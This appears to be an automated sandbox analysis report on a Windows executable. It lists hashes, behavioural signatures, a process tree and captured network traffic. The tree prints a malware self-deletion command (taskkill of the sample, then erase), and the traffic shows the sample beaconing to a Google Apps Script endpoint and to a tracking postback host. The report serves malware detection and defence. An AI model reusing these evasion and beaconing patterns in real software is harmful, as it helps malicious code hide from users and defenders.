Analysis
-
max time kernel
122s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
13-10-2023 04:59
Static task
static1
Behavioral task
behavioral1
Sample
f8d48f85213d887e26593cbf8289bbea.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
f8d48f85213d887e26593cbf8289bbea.exe
Resource
win10v2004-20230915-en
General
-
Target
f8d48f85213d887e26593cbf8289bbea.exe
-
Size
338KB
-
MD5
f8d48f85213d887e26593cbf8289bbea
-
SHA1
033a2268f2d5c0cfe36b0b349c625755e1df54d4
-
SHA256
a82cff6bab731179fbc7be78fccab6bbf690aef5978b0ea489840b2e10fc3df5
-
SHA512
c88bbde4590383932485dc1fa1d09302d58138c58baeed858fee54fd978184921ae65ef822f4781dd52f44716b3715705f3778bfca03fe1d7b577b790bd5d2ed
-
SSDEEP
6144:iew5vMsL1OLtun0ZB6rs71LH1i9DZ0yt5:iR1LUd6rw1LHSDq4
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation f8d48f85213d887e26593cbf8289bbea.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3608 3416 WerFault.exe 25 -
Kills process with taskkill 1 IoCs
pid Process 3652 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3652 taskkill.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3416 wrote to memory of 4464 3416 f8d48f85213d887e26593cbf8289bbea.exe 94 PID 3416 wrote to memory of 4464 3416 f8d48f85213d887e26593cbf8289bbea.exe 94 PID 3416 wrote to memory of 4464 3416 f8d48f85213d887e26593cbf8289bbea.exe 94 PID 4464 wrote to memory of 3652 4464 cmd.exe 97 PID 4464 wrote to memory of 3652 4464 cmd.exe 97 PID 4464 wrote to memory of 3652 4464 cmd.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\f8d48f85213d887e26593cbf8289bbea.exe"C:\Users\Admin\AppData\Local\Temp\f8d48f85213d887e26593cbf8289bbea.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "f8d48f85213d887e26593cbf8289bbea.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\f8d48f85213d887e26593cbf8289bbea.exe" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im "f8d48f85213d887e26593cbf8289bbea.exe" /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3652
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 18802⤵
- Program crash
PID:3608
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3416 -ip 34161⤵PID:4444
Network
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request2.136.104.51.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request8.3.197.209.in-addr.arpaIN PTRResponse8.3.197.209.in-addr.arpaIN PTRvip0x008map2sslhwcdnnet
-
Remote address:8.8.8.8:53Request72.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request108.211.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request26.165.165.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request18.31.95.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request254.7.248.8.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestscript.google.comIN AResponsescript.google.comIN A172.217.23.206
-
GEThttp://script.google.com/macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=5&ip=NOIP&slots=2222¶m=emptyf8d48f85213d887e26593cbf8289bbea.exeRemote address:172.217.23.206:80RequestGET /macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=5&ip=NOIP&slots=2222¶m=empty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Host: script.google.com
ResponseHTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 18 Oct 2023 03:31:17 GMT
Location: https://script.google.com/macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=5&ip=NOIP&slots=2222¶m=empty
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Server: GSE
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
-
GEThttps://script.google.com/macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=5&ip=NOIP&slots=2222¶m=emptyf8d48f85213d887e26593cbf8289bbea.exeRemote address:172.217.23.206:443RequestGET /macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=5&ip=NOIP&slots=2222¶m=empty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Host: script.google.com
ResponseHTTP/1.1 302 Moved Temporarily
Access-Control-Allow-Origin: *
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 18 Oct 2023 03:31:19 GMT
Location: https://script.googleusercontent.com/macros/echo?user_content_key=LNXWMrdWN6ZYOWDHMAtSe_YWxqkkvbDjxK2eI2pgBj8YMAIlZyu3GE8GykcoESaC6avrDKoaQx-p-sQ0JUV0hkTOReBTPCeuOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa_kSw3KJAyZKK3RTU5bpIFQ10ckTyHVSt1vTS5MZ6zqvS4V0cmy1dEEXVXg5zXDjcYCeAylu8DyVhn7i0fteRV_StcynBwb4deQK9NYe9nyjGugVZE-wIMxqgQX8JhELwW1HKFlogGMzl5YZMv-zanmfUJ0nV5QOX3d-7DXRm3Ta&lib=MAg_X_j8YJSR0PZgL-LNb21v93CYKtC0D
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
-
Remote address:8.8.8.8:53Request206.23.217.172.in-addr.arpaIN PTRResponse206.23.217.172.in-addr.arpaIN PTRprg03s05-in-f141e100net206.23.217.172.in-addr.arpaIN PTRprg03s05-in-f206�I206.23.217.172.in-addr.arpaIN PTRams16s37-in-f14�I
-
Remote address:8.8.8.8:53Requestscript.googleusercontent.comIN AResponsescript.googleusercontent.comIN CNAMEgooglehosted.l.googleusercontent.comgooglehosted.l.googleusercontent.comIN A142.251.36.1
-
GEThttps://script.googleusercontent.com/macros/echo?user_content_key=LNXWMrdWN6ZYOWDHMAtSe_YWxqkkvbDjxK2eI2pgBj8YMAIlZyu3GE8GykcoESaC6avrDKoaQx-p-sQ0JUV0hkTOReBTPCeuOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa_kSw3KJAyZKK3RTU5bpIFQ10ckTyHVSt1vTS5MZ6zqvS4V0cmy1dEEXVXg5zXDjcYCeAylu8DyVhn7i0fteRV_StcynBwb4deQK9NYe9nyjGugVZE-wIMxqgQX8JhELwW1HKFlogGMzl5YZMv-zanmfUJ0nV5QOX3d-7DXRm3Ta&lib=MAg_X_j8YJSR0PZgL-LNb21v93CYKtC0Df8d48f85213d887e26593cbf8289bbea.exeRemote address:142.251.36.1:443RequestGET /macros/echo?user_content_key=LNXWMrdWN6ZYOWDHMAtSe_YWxqkkvbDjxK2eI2pgBj8YMAIlZyu3GE8GykcoESaC6avrDKoaQx-p-sQ0JUV0hkTOReBTPCeuOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa_kSw3KJAyZKK3RTU5bpIFQ10ckTyHVSt1vTS5MZ6zqvS4V0cmy1dEEXVXg5zXDjcYCeAylu8DyVhn7i0fteRV_StcynBwb4deQK9NYe9nyjGugVZE-wIMxqgQX8JhELwW1HKFlogGMzl5YZMv-zanmfUJ0nV5QOX3d-7DXRm3Ta&lib=MAg_X_j8YJSR0PZgL-LNb21v93CYKtC0D HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Host: script.googleusercontent.com
ResponseHTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 18 Oct 2023 03:31:19 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
Transfer-Encoding: chunked
-
Remote address:8.8.8.8:53Requesttrk.srcstat.comIN AResponsetrk.srcstat.comIN CNAMExxe82.bmtrck.comxxe82.bmtrck.comIN A3.70.16.242
-
GEThttp://trk.srcstat.com/postback?cid=REPLACE&payout=OPTIONAL&txid=OPTIONALf8d48f85213d887e26593cbf8289bbea.exeRemote address:3.70.16.242:80RequestGET /postback?cid=REPLACE&payout=OPTIONAL&txid=OPTIONAL HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Host: trk.srcstat.com
ResponseHTTP/1.1 400 Bad Request
Date: Wed, 18 Oct 2023 03:31:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 134
Connection: keep-alive
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Bitness,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Full-Version,Sec-CH-UA-Mobile,Sec-CH-UA-Platform,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Reduced
Access-Control-Allow-Origin: *
ETag: W/"86-W1anoWM3jbC0X5xVlSksmemF4cY"
X-Response-Time: 3.511ms
-
Remote address:8.8.8.8:53Request1.36.251.142.in-addr.arpaIN PTRResponse1.36.251.142.in-addr.arpaIN PTRams15s44-in-f11e100net
-
Remote address:8.8.8.8:53Request242.16.70.3.in-addr.arpaIN PTRResponse242.16.70.3.in-addr.arpaIN PTRec2-3-70-16-242eu-central-1compute amazonawscom
-
Remote address:8.8.8.8:53Request131.109.69.13.in-addr.arpaIN PTRResponse
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
172.217.23.206:80http://script.google.com/macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=5&ip=NOIP&slots=2222¶m=emptyhttpf8d48f85213d887e26593cbf8289bbea.exe481 B 1.2kB 5 4
HTTP Request
GET http://script.google.com/macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=5&ip=NOIP&slots=2222¶m=emptyHTTP Response
301 -
172.217.23.206:443https://script.google.com/macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=5&ip=NOIP&slots=2222¶m=emptytls, httpf8d48f85213d887e26593cbf8289bbea.exe1.0kB 9.2kB 10 13
HTTP Request
GET https://script.google.com/macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=5&ip=NOIP&slots=2222¶m=emptyHTTP Response
302 -
142.251.36.1:443https://script.googleusercontent.com/macros/echo?user_content_key=LNXWMrdWN6ZYOWDHMAtSe_YWxqkkvbDjxK2eI2pgBj8YMAIlZyu3GE8GykcoESaC6avrDKoaQx-p-sQ0JUV0hkTOReBTPCeuOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa_kSw3KJAyZKK3RTU5bpIFQ10ckTyHVSt1vTS5MZ6zqvS4V0cmy1dEEXVXg5zXDjcYCeAylu8DyVhn7i0fteRV_StcynBwb4deQK9NYe9nyjGugVZE-wIMxqgQX8JhELwW1HKFlogGMzl5YZMv-zanmfUJ0nV5QOX3d-7DXRm3Ta&lib=MAg_X_j8YJSR0PZgL-LNb21v93CYKtC0Dtls, httpf8d48f85213d887e26593cbf8289bbea.exe1.3kB 10.5kB 10 13
HTTP Request
GET https://script.googleusercontent.com/macros/echo?user_content_key=LNXWMrdWN6ZYOWDHMAtSe_YWxqkkvbDjxK2eI2pgBj8YMAIlZyu3GE8GykcoESaC6avrDKoaQx-p-sQ0JUV0hkTOReBTPCeuOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa_kSw3KJAyZKK3RTU5bpIFQ10ckTyHVSt1vTS5MZ6zqvS4V0cmy1dEEXVXg5zXDjcYCeAylu8DyVhn7i0fteRV_StcynBwb4deQK9NYe9nyjGugVZE-wIMxqgQX8JhELwW1HKFlogGMzl5YZMv-zanmfUJ0nV5QOX3d-7DXRm3Ta&lib=MAg_X_j8YJSR0PZgL-LNb21v93CYKtC0DHTTP Response
200 -
3.70.16.242:80http://trk.srcstat.com/postback?cid=REPLACE&payout=OPTIONAL&txid=OPTIONALhttpf8d48f85213d887e26593cbf8289bbea.exe440 B 778 B 6 4
HTTP Request
GET http://trk.srcstat.com/postback?cid=REPLACE&payout=OPTIONAL&txid=OPTIONALHTTP Response
400
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
2.136.104.51.in-addr.arpa
-
70 B 111 B 1 1
DNS Request
8.3.197.209.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
72.32.126.40.in-addr.arpa
-
74 B 145 B 1 1
DNS Request
108.211.229.192.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
26.165.165.52.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
18.31.95.13.in-addr.arpa
-
70 B 124 B 1 1
DNS Request
254.7.248.8.in-addr.arpa
-
63 B 79 B 1 1
DNS Request
script.google.com
DNS Response
172.217.23.206
-
73 B 173 B 1 1
DNS Request
206.23.217.172.in-addr.arpa
-
74 B 119 B 1 1
DNS Request
script.googleusercontent.com
DNS Response
142.251.36.1
-
61 B 104 B 1 1
DNS Request
trk.srcstat.com
DNS Response
3.70.16.242
-
71 B 109 B 1 1
DNS Request
1.36.251.142.in-addr.arpa
-
70 B 134 B 1 1
DNS Request
242.16.70.3.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
131.109.69.13.in-addr.arpa